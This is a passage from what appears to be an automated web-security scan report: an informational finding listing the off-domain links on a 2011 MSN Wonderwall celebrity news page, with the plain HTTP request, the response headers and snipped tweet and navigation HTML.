<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Aww and I love Tampa! RT <a href="http://twitter.com/RNB_007">@RNB_007</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789035353112576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781771502260225">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: <a href="http://twitter.com/yerdua4">@yerdua4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781494627864576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: Thx 4 all the support, I hope to extend my tour and visit your city. Chicago is looking bad... get an autograohed copy <a href="http://bit.ly/fzn41j">http://bit.ly/fzn41j</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32780150873522177">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: I'll be on Wendy Williams latr today talking The Naked Mom and romance. have you seen my book yet <a href="Http://thenakedmom.com">Http://thenakedmom.com</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32779078033473536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32778524804775936">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/sweetieHughes">@sweetieHughes</a> loved when I did that ;) RT <a href="http://twitter.com/_michaelGAGA">@_michaelGAGA</a>: Lmfaoooo <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32776407499149312">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/WonderwallMSN">WonderwallMSN</a>: Snooki finds her long lost rodent love: will there be 6 more weeks of winter in The Jerz or is spring on its way? <a href="http://on-msn.com/dG3a7i">http://on-msn.com/dG3a7i</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/WonderwallMSN/statuses/32772731053277184">Twitter</a>
...[SNIP]...
<li><a href="http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2">Women cautious about social media and ...</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5">Bing: James Franco to teach class about ...</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.216. http://wonderwall.msn.com/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.msn.com/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story?GT1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://bit.ly/fzn41j
http://bit.ly/gO5b3F
http://del.icio.us/post?title=Nicole+Kidman%3A+Raising+Baby+Faith+Margaret%27Is+Beyond+Thrilling%27&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fnicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
http://digg.com/submit?phase=2title=Nicole+Kidman%3A+Raising+Baby+Faith+Margaret%27Is+Beyond+Thrilling%27&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fnicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
http://download.live.com/?sku=messenger
http://fb.me/Od4vcPhS
http://fb.me/zQHk5Tm1
http://go.microsoft.com/fwlink/?LinkId=74170
http://huff.to/dOv31R
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://on-msn.com/dG3a7i
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://ow.ly/3OOBd
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=Nicole+Kidman%3A+Raising+Baby+Faith+Margaret%27Is+Beyond+Thrilling%27&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fnicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296617453/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg
http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg
http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg
http://static.wonderwall.com/photos/Module1x1/41887_Module1x1_634285447252392358.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://static.wonderwall.com/photos/Original/41887_Original.jpg
http://thenakedmom.com/
http://tmi.me/6g1HB
http://twitter.com/BravoAndy
http://twitter.com/CountessLuAnn
http://twitter.com/CountessLuAnn/statuses/32790989567426560
http://twitter.com/Diamonds214
http://twitter.com/Jillzarin
http://twitter.com/Jillzarin/statuses/32798137911345152
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/32797990213124097
http://twitter.com/Kimzolciak
http://twitter.com/Kimzolciak/statuses/32776407499149312
http://twitter.com/Kimzolciak/statuses/32789035353112576
http://twitter.com/Kimzolciak/statuses/32789163472330752
http://twitter.com/Kimzolciak/statuses/32789790063591424
http://twitter.com/Kimzolciak/statuses/32796834711732224
http://twitter.com/Kimzolciak/statuses/32797271749820416
http://twitter.com/Kimzolciak/statuses/32797550088028160
http://twitter.com/Kimzolciak/statuses/32797701804400640
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/32802397742960640
http://twitter.com/Pilltastic
http://twitter.com/RHWONY
http://twitter.com/RNB_007
http://twitter.com/SimonvanKempen
http://twitter.com/SkaredOfMee
http://twitter.com/SonjatMorgan
http://twitter.com/WonderwallMSN
http://twitter.com/WonderwallMSN/statuses/32772731053277184
http://twitter.com/_michaelGAGA
http://twitter.com/bretmichaels
http://twitter.com/bretmichaels/statuses/32796448315678721
http://twitter.com/bretmichaels/statuses/32810341914116096
http://twitter.com/brookeburke
http://twitter.com/brookeburke/statuses/32778524804775936
http://twitter.com/brookeburke/statuses/32779078033473536
http://twitter.com/brookeburke/statuses/32780150873522177
http://twitter.com/brookeburke/statuses/32781494627864576
http://twitter.com/brookeburke/statuses/32781771502260225
http://twitter.com/channingtatum
http://twitter.com/channingtatum/statuses/32802789788745728
http://twitter.com/foodjunkie101
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/32808608114671616
http://twitter.com/iamdiddy/statuses/32810279058276352
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/32814304038232064
http://twitter.com/meka2blessed4u
http://twitter.com/ramonasinger
http://twitter.com/ramonasinger/statuses/32800833896714241
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fnicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story%3Focid%3Dtwtr-utweet
http://twitter.com/supercrosslive
http://twitter.com/sweetieHughes
http://twitter.com/yerdua4
http://www.accesshollywood.com/nicole-kidman-and-keith-urban-open-up-about-newborn-baby-faith-margaret-and-daughter-sundays-reaction_article_43017
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fnicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Nicole+Kidman%3A+Raising+Baby+Faith+Margaret%27Is+Beyond+Thrilling%27&u=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fnicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
http://www.supercrossonline.com/bretmichaels/
http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2
http://www.usmagazine.com/
http://www.usmagazine.com/momsbabies/photos/babies-of-the-year-2010-20103012
http://www.usmagazine.com/momsbabies/photos/celebrity-surrogacy-2011211/
http://www.usmagazine.com/stylebeauty/photos/sag-awards-2011-what-the-stars-wore-2011301
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fnicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story?GT1=28135 HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:45 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 3
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <a href="http://huff.to/dOv31R">http://huff.to/dOv31R</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/32808608114671616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/channingtatum">channingtatum</a>: VIDEOS OF THE WEEK: Check out Chan in 2 new film clips and a behind-the-scenes featurette from ...The Eagle...... <a href="http://ow.ly/3OOBd">http://ow.ly/3OOBd</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/channingtatum/statuses/32802789788745728">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: Surprise!!! I've been keeping another secret! <a href="http://bit.ly/gO5b3F">http://bit.ly/gO5b3F</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/32802397742960640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/ramonasinger">ramonasinger</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/ramonasinger/statuses/32800833896714241">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/32798137911345152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/32797990213124097">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: 32 thank u! RT <a href="http://twitter.com/SkaredOfMee">@SkaredOfMee</a>: RT <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797701804400640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/meka2blessed4u">@meka2blessed4u</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797550088028160">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/Diamonds214">@Diamonds214</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Ugh! Try to nap when the baby does n play Mozart n put the headphones on ur belly. ... <a href="http://tmi.me/6g1HB">http://tmi.me/6g1HB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797271749820416">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Hell to the No!! He is not quiet! RT <a href="http://twitter.com/RHWONY">@RHWONY</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32796834711732224">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/bretmichaels">bretmichaels</a>: Vote for The Bret Michaels' Rock Hard-Ride Hard Award!
<a href="http://www.supercrossonline.com/bretmichaels/">http://www.supercrossonline.com/bretmichaels/</a> <a href="http://twitter.com/supercrosslive">@supercrosslive</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/bretmichaels/statuses/32796448315678721">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/CountessLuAnn">CountessLuAnn</a>: With Mariska Hargitay before she left the set for the SAG Awards. We could be sisters! Shooting on location for... <a href="http://fb.me/zQHk5Tm1">http://fb.me/zQHk5Tm1</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/CountessLuAnn/statuses/32790989567426560">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789790063591424">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/foodjunkie101">@foodjunkie101</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789163472330752">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Aww and I love Tampa! RT <a href="http://twitter.com/RNB_007">@RNB_007</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789035353112576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781771502260225">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: <a href="http://twitter.com/yerdua4">@yerdua4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781494627864576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: Thx 4 all the support, I hope to extend my tour and visit your city. Chicago is looking bad... get an autograohed copy <a href="http://bit.ly/fzn41j">http://bit.ly/fzn41j</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32780150873522177">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: I'll be on Wendy Williams latr today talking The Naked Mom and romance. have you seen my book yet <a href="Http://thenakedmom.com">Http://thenakedmom.com</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32779078033473536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32778524804775936">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/sweetieHughes">@sweetieHughes</a> loved when I did that ;) RT <a href="http://twitter.com/_michaelGAGA">@_michaelGAGA</a>: Lmfaoooo <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32776407499149312">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/WonderwallMSN">WonderwallMSN</a>: Snooki finds her long lost rodent love: will there be 6 more weeks of winter in The Jerz or is spring on its way? <a href="http://on-msn.com/dG3a7i">http://on-msn.com/dG3a7i</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/WonderwallMSN/statuses/32772731053277184">Twitter</a>
...[SNIP]...
<li><a href="http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2">Women cautious about social media and ...</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5">Bing: James Franco to teach class about ...</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

